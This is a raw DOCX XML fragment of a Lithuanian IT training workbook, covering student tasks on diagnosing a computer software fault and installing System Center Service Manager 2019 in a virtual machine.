          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUSTATYTI KOMPIUTERINĖS SISTEMOS PROGRAMINĮ GEDIMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99710C" w14:textId="2D5BBF73" w:rsidR="00531AAE" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="7DC494C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="7DC494C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Mokinys turi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įvardinti gedimą, nustatyti jo priežastį</w:t>
      </w:r>
      <w:r w:rsidR="00CA1975" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00CA1975" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir pateikti gedimo šalinimo būdus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0198C3" w14:textId="5F92CA33" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1879A6CB" w14:textId="2B94FED9" w:rsidR="509A0CEB" w:rsidRPr="005A5C28" w:rsidRDefault="7DC494C5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36241CFB" w14:textId="75778949" w:rsidR="509A0CEB" w:rsidRPr="005A5C28" w:rsidRDefault="7DC494C5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jei tai ne aparatinis gedimas,</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>reikia žiūrėti aut</w:t>
      </w:r>
      <w:r w:rsidR="240D4DBA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>omatin</w:t>
      </w:r>
      <w:r w:rsidR="629DD8E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidR="7B2E0637" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> operacinės sistemos</w:t>
      </w:r>
      <w:r w:rsidR="240D4DBA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atnaujinimą</w:t>
      </w:r>
      <w:r w:rsidR="527A59AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jeigu </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>neturite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SSD,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="5D230DB8" w:rsidRPr="005A5C28">
        <w:t>atikrinkite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4D42C6F5" w:rsidRPr="005A5C28">
        <w:t>automatinį</w:t>
      </w:r>
      <w:r w:rsidR="73E64886" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> operacinės sistemos</w:t>
      </w:r>
      <w:r w:rsidR="4D42C6F5" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D7305D" w:rsidRPr="005A5C28">
        <w:t>paleidimą</w:t>
      </w:r>
      <w:r w:rsidR="4D42C6F5" w:rsidRPr="005A5C28">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4D42C6F5" w:rsidRPr="005A5C28">
        <w:t>išjun</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> automatinius atnaujinimus</w:t>
      </w:r>
      <w:r w:rsidR="4D42C6F5" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4D42C6F5" w:rsidRPr="005A5C28">
        <w:t>viską, kas yra nereikalinga iš automatinio pa</w:t>
      </w:r>
      <w:r w:rsidR="00942F1C" w:rsidRPr="005A5C28">
        <w:t>leidi</w:t>
      </w:r>
      <w:r w:rsidR="4D42C6F5" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">mo (Startup Apps) failo. </w:t>
      </w:r>
      <w:r w:rsidR="1E82E326" w:rsidRPr="005A5C28">
        <w:t>Atnaujinimai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> gali pradėti diegimą labai nepatogiu laiku, pvz.</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kai ju</w:t>
      </w:r>
      <w:r w:rsidR="76FFF6B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">s labai reikalingas </w:t>
      </w:r>
      <w:r w:rsidR="456A5192" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuteris</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="44FD0496" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atnaujinimai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>intensyviai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">apkrauna </w:t>
      </w:r>
      <w:r w:rsidR="741D0BB4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuterio</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> resursus.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atikrin</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, ar kompiuterio nepažeidė virusai</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C0258" w14:textId="1BCA0FBE" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="085CE88C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B764846" w14:textId="77777777" w:rsidR="00713793" w:rsidRPr="005A5C28" w:rsidRDefault="00713793"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5 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ĮDIEGTI INCIDENTŲ VALDYMO SISTEMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAAF829" w14:textId="09405EF4" w:rsidR="64701C0D" w:rsidRPr="005A5C28" w:rsidRDefault="003D0EE7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMI REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="6C5F544E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="6C5F544E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti įdiegtos virtualios mašinos (VirtualBox arba VMware workstation player) ir System Center Service Manager 2019 operacinės sistemos</w:t>
      </w:r>
      <w:r w:rsidR="52D79509" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ekrano atvaizdus </w:t>
      </w:r>
      <w:r w:rsidR="52D79509" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>arba diegimo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> aprašymą</w:t>
      </w:r>
      <w:r w:rsidR="6C5F544E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB158C6" w14:textId="1BCA0FBE" w:rsidR="64701C0D" w:rsidRPr="005A5C28" w:rsidRDefault="6C5F544E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D1F6D" w14:textId="1BCA0FBE" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="085CE88C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE17985" w14:textId="1BCA0FBE" w:rsidR="49268BA0" w:rsidRPr="005A5C28" w:rsidRDefault="12C2587F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F2E448B" wp14:editId="73A6CE9E">
            <wp:extent cx="2209800" cy="2840060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="994336210" name="Picture 99433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336210"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId244">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2209800" cy="2840060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A0F4E" w14:textId="53E25AFC" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00037E6B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="12B07C5A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. </w:t>
      </w:r>
      <w:r w:rsidR="2CC2FFDA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Vieno kompiuterio diegimas, kuriame naudoja</w:t>
      </w:r>
      <w:r w:rsidR="1EBAFB0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mas</w:t>
      </w:r>
      <w:r w:rsidR="6044318A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> realus</w:t>
      </w:r>
      <w:r w:rsidR="2CC2FFDA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuter</w:t>
      </w:r>
      <w:r w:rsidR="5CCB16A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="2CC2FFDA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Windows Server“ </w:t>
      </w:r>
      <w:r w:rsidR="6FCCFB8A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="2CC2FFDA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Hyper-V“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B5732" w14:textId="6E4E20B7" w:rsidR="43464638" w:rsidRPr="005A5C28" w:rsidRDefault="7993C732" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: </w:t>
      </w:r>
      <w:r w:rsidR="47E73CC0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Saive R. (</w:t>
      </w:r>
      <w:r w:rsidR="39057B0D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2020, liepos 3). </w:t>
      </w:r>
      <w:r w:rsidR="6C5E87B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">13 Linux Network Configuration and Troubleshooting Command. </w:t>
      </w:r>
      <w:r w:rsidR="6C5827CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TechMint. </w:t>
      </w:r>
      <w:r w:rsidR="2CC2FFDA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId245">
        <w:r w:rsidR="2CC2FFDA" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15D6CCC3" w14:textId="1BCA0FBE" w:rsidR="55E3797F" w:rsidRPr="005A5C28" w:rsidRDefault="55E3797F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC2CB6F" w14:textId="7A392437" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="152383A3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„Service Manager“ diegimas</w:t>
      </w:r>
      <w:r w:rsidR="67378F24" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F3D351" w14:textId="666A60D2" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="152383A3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Norėdami įdiegti „System Center“ - „Service Manager“ į vieną kompiuterį, kompiuteryje įdiekite „Service Manager“ valdymo serverį, duomenų bazę ir konsolę. T</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aip</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įdiegiate duomenų saugyklą virtualioje mašinoje tame pačiame kompiuteryje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF09660" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="152383A3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sąrankos metu būsite paraginti pateikti šių paskyrų kredencialus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D72CF" w14:textId="1A11471C" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="152383A3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Valdymo grupės administratorius</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8790EE" w14:textId="23E1C973" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="152383A3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
